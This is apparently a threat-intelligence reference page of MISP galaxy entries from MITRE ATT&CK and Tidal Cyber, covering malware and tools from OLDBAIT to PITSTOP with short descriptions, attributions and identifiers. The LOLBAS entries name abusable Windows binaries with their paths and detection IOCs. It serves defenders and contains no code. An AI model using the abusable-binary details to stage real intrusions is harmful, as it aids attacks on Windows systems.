type | ['malware'] |
OLDBAIT
OLDBAIT is a credential harvester used by APT28. [FireEye APT28] [FireEye APT28 January 2017]
Internal MISP references
UUID 479814e2-2656-4ea2-9e79-fcdb818f703e
which can be used as unique global reference for OLDBAIT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0138 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Olympic Destroyer
Olympic Destroyer is malware that was used by Sandworm Team against the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware was to render infected computer systems inoperable. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. Olympic Destroyer has worm-like features to spread itself across a computer network in order to maximize its destructive impact.[Talos Olympic Destroyer 2018][US District Court Indictment GRU Unit 74455 October 2020]
Internal MISP references
UUID 073b5288-11d6-4db0-9f2c-a1816847d15c
which can be used as unique global reference for Olympic Destroyer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0365 |
source | MITRE |
tags | ['e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
OneDriveStandaloneUpdater
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: OneDrive Standalone Updater
Author: Elliot Killick
Paths:
* %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Resources:
* https://github.com/LOLBAS-Project/LOLBAS/pull/153
Detection:
* IOC: HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL
* IOC: Reports of downloading from suspicious URLs in %localappdata%\OneDrive\setup\logs\StandaloneUpdate_*.log files
* Sigma: registry_set_lolbin_onedrivestandaloneupdater.yml[OneDriveStandaloneUpdater.exe - LOLBAS Project]
Internal MISP references
UUID 49ef42bc-0958-4b61-9593-a4af69432410
which can be used as unique global reference for OneDriveStandaloneUpdater
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5136 |
source | Tidal Cyber |
tags | ['b6116080-8fbf-4e9f-9206-20b025f2cf23', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
OnionDuke
OnionDuke is malware that was used by APT29 from 2013 to 2015. [F-Secure The Dukes]
Internal MISP references
UUID 6056bf36-fb45-498d-a285-5f98ae08b090
which can be used as unique global reference for OnionDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0052 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
OopsIE
OopsIE is a Trojan used by OilRig to remotely execute commands as well as upload/download files to/from victims. [Unit 42 OopsIE! Feb 2018]
Internal MISP references
UUID 4f1894d4-d085-4348-af50-dfda257a9e18
which can be used as unique global reference for OopsIE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0264 |
source | MITRE |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['malware'] |
OpenConsole
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Console Window host for Windows Terminal
Author: Nasreddine Bencherchali
Paths:
* C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
* C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe
* C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
Resources:
* https://twitter.com/nas_bench/status/1537563834478645252
Detection:
* IOC: OpenConsole.exe spawning unexpected processes
* Sigma: proc_creation_win_lolbin_openconsole.yml[OpenConsole.exe - LOLBAS Project]
Internal MISP references
UUID 54030309-671d-4e4b-b9c0-619cd07f5e05
which can be used as unique global reference for OpenConsole
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5230 |
source | Tidal Cyber |
tags | ['1dd2d703-fed1-41d2-9843-7b276ef3d6f2', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
OpenSSH
OpenSSH is a publicly available tool for traffic encryption and remote login using the Secure Shell ("SSH") protocol. According to its project website, it also "provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options".[OpenSSH Project Page]
Internal MISP references
UUID 5edec691-d2f1-4928-a12d-1ff59ba959a6
which can be used as unique global reference for OpenSSH
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5273 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '2feda37d-5579-4102-a073-aa02e82cb49f', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
Orz
Orz is a custom JavaScript backdoor used by Leviathan. It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. [Proofpoint Leviathan Oct 2017] [FireEye Periscope March 2018]
Internal MISP references
UUID 45a52a29-00c0-458a-b705-1040e06a43f2
which can be used as unique global reference for Orz
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0229 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
OSInfo
OSInfo is a custom tool used by APT3 to do internal discovery on a victim's computer and network. [Symantec Buckeye]
Internal MISP references
UUID fa1e13b8-2fb7-42e8-b630-25f0edfbca65
which can be used as unique global reference for OSInfo
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0165 |
source | MITRE |
type | ['malware'] |
OSX_OCEANLOTUS.D
OSX_OCEANLOTUS.D is a macOS backdoor used by APT32. Since its first discovery in 2015, APT32 has continued to improve it, using a plugin architecture to extend its capabilities, specifically through .dylib files. OSX_OCEANLOTUS.D can also determine its permission level and execute according to access type (root or user).[Unit42 OceanLotus 2017][TrendMicro MacOS April 2018][Trend Micro MacOS Backdoor November 2020]
Internal MISP references
UUID a45904b5-0ada-4567-be4c-947146c7f574
which can be used as unique global reference for OSX_OCEANLOTUS.D
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0352 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
OSX/Shlayer
OSX/Shlayer is a Trojan designed to install adware on macOS that was first discovered in 2018.[Carbon Black Shlayer Feb 2019][Intego Shlayer Feb 2018]
Internal MISP references
UUID 4d91d625-21d8-484a-b63f-0a3daa4ed434
which can be used as unique global reference for OSX/Shlayer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0402 |
source | MITRE |
type | ['malware'] |
Out1
Out1 is a remote access tool written in Python and used by MuddyWater since at least 2021.[Trend Micro Muddy Water March 2021]
Internal MISP references
UUID 273b1e8d-a23d-4c22-8493-80f3d6639352
which can be used as unique global reference for Out1
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0594 |
source | MITRE |
type | ['tool'] |
OutSteel
OutSteel is a file uploader and document stealer developed with the scripting language AutoIT that has been used by Ember Bear since at least March 2021.[Palo Alto Unit 42 OutSteel SaintBot February 2022]
Internal MISP references
UUID 042fe42b-f60e-45e1-b47d-a913e0677976
which can be used as unique global reference for OutSteel
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1017 |
source | MITRE |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745', '4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
OwaAuth
OwaAuth is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by Threat Group-3390. [Dell TG-3390]
Internal MISP references
UUID 6d8a8510-e6f1-49a7-b3a5-bd4664937147
which can be used as unique global reference for OwaAuth
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0072 |
source | MITRE |
type | ['malware'] |
P2P ZeuS
P2P ZeuS is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture. [Dell P2P ZeuS]
Internal MISP references
UUID 916f8a7c-e487-4446-b6ee-c8da712a9569
which can be used as unique global reference for P2P ZeuS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0016 |
source | MITRE |
type | ['malware'] |
P8RAT
P8RAT is a fileless malware used by menuPass to download and execute payloads since at least 2020.[Securelist APT10 March 2021]
Internal MISP references
UUID 1933ad3d-3085-4b1b-82b9-ac51b440e2bf
which can be used as unique global reference for P8RAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0626 |
source | MITRE |
type | ['malware'] |
PACEMAKER
PACEMAKER is a credential stealer that was used by APT5 as early as 2020 including activity against US Defense Industrial Base (DIB) companies.[Mandiant Pulse Secure Zero-Day April 2021]
Internal MISP references
UUID 13856c51-d81c-5d75-bb6a-0bbdcc857cdd
which can be used as unique global reference for PACEMAKER
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network', 'Linux'] |
software_attack_id | S1109 |
source | MITRE |
type | ['malware'] |
Pacu
Pacu is an open-source AWS exploitation framework. The tool is written in Python and publicly available on GitHub.[GitHub Pacu]
Internal MISP references
UUID e90eb529-1665-5fd7-a44e-695715e4081b
which can be used as unique global reference for Pacu
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['IaaS'] |
software_attack_id | S1091 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'e81ba503-60b0-4b64-8f20-ef93e7783796', 'a2e000da-8181-4327-bacd-32013dbd3654', '2e5f6e4a-4579-46f7-9997-6923180815dd', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
Pandora
Pandora is a multistage kernel rootkit with backdoor functionality that has been in use by Threat Group-3390 since at least 2020.[Trend Micro Iron Tiger April 2021]
Internal MISP references
UUID 320b0784-4f0f-46ea-99e9-c34bfcca1c2e
which can be used as unique global reference for Pandora
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0664 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Pasam
Pasam is a trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Pasam May 2012]
Internal MISP references
UUID 3f018e73-d09b-4c8d-815b-8b2c8faf7055
which can be used as unique global reference for Pasam
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0208 |
source | MITRE |
type | ['malware'] |
Pass-The-Hash Toolkit
Pass-The-Hash Toolkit is a toolkit that allows an adversary to "pass" a password hash (without knowing the original password) to log in to systems. [Mandiant APT1]
Internal MISP references
UUID 8d007d52-8898-494c-8d72-354abd93da1e
which can be used as unique global reference for Pass-The-Hash Toolkit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0122 |
source | MITRE |
type | ['tool'] |
PasswordFox
PasswordFox is a tool used to recover passwords from Firefox web browser.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID e12e1de8-a0d9-4602-8264-5952106bd53c
which can be used as unique global reference for PasswordFox
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5037 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
P.A.S. Webshell
P.A.S. Webshell is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.[ANSSI Sandworm January 2021]
Internal MISP references
UUID 4d79530c-2fd9-4438-a8da-74f42119695a
which can be used as unique global reference for P.A.S. Webshell
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0598 |
source | MITRE |
tags | ['311abf64-a9cc-4c6a-b778-32c5df5658be'] |
type | ['malware'] |
Pay2Key
Pay2Key is a ransomware written in C++ that has been used by Fox Kitten since at least July 2020, including in campaigns against Israeli companies. Pay2Key has been paired with a leak site that displays stolen sensitive information to further pressure victims into payment.[ClearSky Fox Kitten February 2020][Check Point Pay2Key November 2020]
Internal MISP references
UUID 9aa21e50-726e-4002-8b7b-75697a03eb2b
which can be used as unique global reference for Pay2Key
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0556 |
source | MITRE |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Pcalua
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Program Compatibility Assistant
Author: Oddvar Moe
Paths:
* C:\Windows\System32\pcalua.exe
Resources:
* https://twitter.com/KyleHanslovan/status/912659279806640128
Detection:
* Sigma: proc_creation_win_lolbin_pcalua.yml[Pcalua.exe - LOLBAS Project]
Internal MISP references
UUID 00daafc4-8bf1-4447-b24f-1580263124f5
which can be used as unique global reference for Pcalua
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5137 |
source | Tidal Cyber |
tags | ['074533ec-e14a-4dc3-98ae-c029904e3d6d', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Pcexter
Pcexter is an uploader that has been used by ToddyCat since at least 2023 to exfiltrate stolen files.[Kaspersky ToddyCat Check Logs October 2023]
Internal MISP references
UUID 873ede85-548b-5fc0-a29e-80bd5afc5bf4
which can be used as unique global reference for Pcexter
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1102 |
source | MITRE |
type | ['malware'] |
PCHunter
PCHunter is a tool used to enable advanced task management, including for system processes and kernels.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 591acc39-1218-4710-aadc-150ae6475ee3
which can be used as unique global reference for PCHunter
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5038 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
PcShare
PcShare is an open source remote access tool that has been modified and used by Chinese threat actors, most notably during the FunnyDream campaign since late 2018.[Bitdefender FunnyDream Campaign November 2020][GitHub PcShare 2014]
Internal MISP references
UUID 71eb2211-39aa-4b89-bd51-9dcabd363149
which can be used as unique global reference for PcShare
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1050 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['tool'] |
Pcwrun
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Program Compatibility Wizard
Author: Oddvar Moe
Paths:
* C:\Windows\System32\pcwrun.exe
Resources:
* https://twitter.com/pabraeken/status/991335019833708544
* https://twitter.com/nas_bench/status/1535663791362519040
Detection:
* Sigma: proc_creation_win_lolbin_pcwrun_follina.yml[Pcwrun.exe - LOLBAS Project]
Internal MISP references
UUID 7babb537-ec29-425a-9108-43d1619e02b5
which can be used as unique global reference for Pcwrun
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5138 |
source | Tidal Cyber |
tags | ['62496b72-7820-4512-b3f9-188464bb8161', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Pcwutl
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft HTML Viewer
Author: LOLBAS Team
Paths:
* c:\windows\system32\pcwutl.dll
* c:\windows\syswow64\pcwutl.dll
Resources:
* https://twitter.com/harr0ey/status/989617817849876488
* https://windows10dll.nirsoft.net/pcwutl_dll.html
Detection:
* Analysis: https://redcanary.com/threat-detection-report/techniques/rundll32/
* Sigma: proc_creation_win_rundll32_susp_activity.yml[Pcwutl.dll - LOLBAS Project]
Internal MISP references
UUID 47ba2c2c-b4f3-48dc-878f-b8cab6d97f65
which can be used as unique global reference for Pcwutl
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5193 |
source | Tidal Cyber |
tags | ['ff5c357e-6b9b-4ef3-a7ed-e5d4c0091c0c', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Peirates
Peirates is a post-exploitation Kubernetes exploitation framework with a focus on gathering service account tokens for lateral movement and privilege escalation. The tool is written in Go and publicly available on GitHub.[Peirates GitHub]
Internal MISP references
UUID 52a19c73-2454-4893-8f84-8d05c37a9472
which can be used as unique global reference for Peirates
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Containers'] |
software_attack_id | S0683 |
source | MITRE |
tags | ['2e5f6e4a-4579-46f7-9997-6923180815dd', '4fa6f8e1-b0d5-4169-8038-33e355c08bde', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
Penquin
Penquin is a remote access trojan (RAT) with multiple versions used by Turla to target Linux systems since at least 2014.[Kaspersky Turla Penquin December 2014][Leonardo Turla Penquin May 2020]
Internal MISP references
UUID 951fad62-f636-4c01-b924-bb0ce87f5b20
which can be used as unique global reference for Penquin
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0587 |
source | MITRE |
type | ['malware'] |
Peppy
Peppy is a Python-based remote access Trojan, active since at least 2012, with similarities to Crimson.[Proofpoint Operation Transparent Tribe March 2016]
Internal MISP references
UUID 1f080577-c002-4b49-a342-fa70983c1d58
which can be used as unique global reference for Peppy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0643 |
source | MITRE |
type | ['malware'] |
Pester
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used as part of the Powershell pester
Author: Oddvar Moe
Paths:
* c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
* c:\Program Files\WindowsPowerShell\Modules\Pester*\bin\Pester.bat
Resources:
* https://twitter.com/Oddvarmoe/status/993383596244258816
* https://twitter.com/st0pp3r/status/1560072680887525378
Detection:
* Sigma: proc_creation_win_lolbin_pester_1.yml[Pester.bat - LOLBAS Project]
Internal MISP references
UUID 5028ed72-8e6b-48bd-b4f4-e42df926893d
which can be used as unique global reference for Pester
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5264 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Phobos Ransomware
This object represents a collection of MITRE ATT&CK® Techniques associated with Phobos ransomware binaries, as highlighted in sources such as joint Cybersecurity Advisory AA24-060A.[U.S. CISA Phobos February 29 2024]
Internal MISP references
UUID d7015696-0aa1-4c13-a0e6-b9d8e027dabf
which can be used as unique global reference for Phobos Ransomware
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5279 |
source | Tidal Cyber |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
PhonyC2
PhonyC2 is a command and control framework attributed to the MuddyWater group. Researchers believe the tool has existed since at least 2021 and has been regularly updated since that time. PhonyC2 is believed to have been used in a 2023 attack on an institute of technology in Israel, as well as in a MuddyWater campaign beginning in May 2023 that featured exploitation of a vulnerability in PaperCut print management software (CVE-2023-27350).[Deep Instinct PhonyC2 June 2023]
Internal MISP references
UUID c6fc073b-fa8a-4fff-a066-3fd788d3ac85
which can be used as unique global reference for PhonyC2
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5307 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '992bdd33-4a47-495d-883a-58010a2f0efb', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
PHOREAL
PHOREAL is a signature backdoor used by APT32. [FireEye APT32 May 2017]
Internal MISP references
UUID fd63cec1-9f72-4ed0-9926-2dbbb3d9cead
which can be used as unique global reference for PHOREAL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0158 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pikabot
Pikabot is a malware first observed in early 2023 that has downloader/dropper and backdoor functionality. Researchers observed Pikabot distribution increase following the disruption of the QakBot botnet by authorities in August 2023. Originally distributed via spam email campaigns, researchers observed the threat actor TA577 (previously known for distributing payloads including QakBot, IcedID, SystemBC, and Cobalt Strike) distributing Pikabot starting in December 2023.[Malwarebytes Pikabot December 15 2023]
Internal MISP references
UUID d2a226a2-ffa1-4bb0-a090-96dc42f9c84c
which can be used as unique global reference for Pikabot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5265 |
source | Tidal Cyber |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pillowmint
Pillowmint is a point-of-sale malware used by FIN7 designed to capture credit card information.[Trustwave Pillowmint June 2020]
Internal MISP references
UUID db5d718b-1344-4aa2-8e6a-54e68d8adfb1
which can be used as unique global reference for Pillowmint
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0517 |
source | MITRE |
tags | ['6c6c0125-9631-4c2c-90ab-cfef374d5198'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PinchDuke
PinchDuke is malware that was used by APT29 from 2008 to 2010. [F-Secure The Dukes]
Internal MISP references
UUID ba2208c8-5e1e-46cd-bef1-ffa7a2be3be4
which can be used as unique global reference for PinchDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0048 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Ping
Ping is an operating system utility commonly used to troubleshoot and verify network connections. [TechNet Ping]
Internal MISP references
UUID 4ea12106-c0a1-4546-bb64-a1675d9f5dc7
which can be used as unique global reference for Ping
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0097 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
PingCastle
PingCastle is a tool that can be used to enumerate Active Directory and map trust relationships. BianLian Ransomware Group actors have used the tool for discovery purposes during attacks.[U.S. CISA BianLian Ransomware May 2023]
Internal MISP references
UUID 1debf242-3c91-4bdb-932c-27d61fe17474
which can be used as unique global reference for PingCastle
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5003 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
PingPull
PingPull is a remote access Trojan (RAT) written in Visual C++ that has been used by GALLIUM since at least June 2022. PingPull has been used to target telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam.[Unit 42 PingPull Jun 2022]
Internal MISP references
UUID 4360cc62-7263-48b2-bd2a-a7737563545c
which can be used as unique global reference for PingPull
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1031 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PipeMon
PipeMon is a multi-stage modular backdoor used by Winnti Group.[ESET PipeMon May 2020]
Internal MISP references
UUID 92744f7b-9f1a-472c-bae0-2d4a7ce68bb4
which can be used as unique global reference for PipeMon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0501 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pisloader
Pisloader is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by APT18 and is similar to another malware family, HTTPBrowser, that has been used by the group. [Palo Alto DNS Requests]
Internal MISP references
UUID 14e65c5d-5164-41a3-92de-67fdd1d529d2
which can be used as unique global reference for Pisloader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0124 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PITSTOP
PITSTOP is a backdoor that was deployed on compromised Ivanti Connect Secure VPNs during Cutting Edge to enable command execution and file read/write.[Mandiant Cutting Edge Part 3 February 2024]
Internal MISP references
UUID c0e56f14-9768-5547-abcb-aa3f220d0e40
which can be used as unique global reference for PITSTOP
in MISP communities and other software using the MISP galaxy
